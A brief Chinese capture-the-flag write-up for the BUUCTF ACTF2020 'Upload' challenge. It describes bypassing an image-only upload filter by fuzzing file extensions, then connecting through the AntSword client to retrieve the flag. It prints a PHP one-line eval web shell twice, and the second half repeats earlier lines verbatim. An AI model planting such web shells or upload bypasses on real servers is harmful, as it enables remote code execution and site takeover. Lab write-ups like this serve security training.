BUUCTF-[ACTF2020 新生赛]Upload
打开靶机后发现是一个文件上传的题目
随便上传一个文件观察路径和返回的方式是什么
发现只能上传jpg,png,gif的文件
上传一个jpg文件
发现页面会回显返回的路径
既然有路径了我们就可以尝试上传一句话木马了
构造一句话木马
<?php
@eval($_POST['rc']);
?>
导入字典观察过滤的哪些后缀
发现基本都没过滤
那就找到返回最长的发送过去
上传成功
蚁剑连接
在根目录中便可找到flag
打开靶机后发现是一个文件上传的题目
发现只能上传jpg,png,gif的文件
发现页面会回显返回的路径
既然有路径了我们就可以尝试上传一句话木马了
<?php
@eval($_POST['rc']);
?>
发现基本都没过滤
上传成功
在根目录中便可找到flag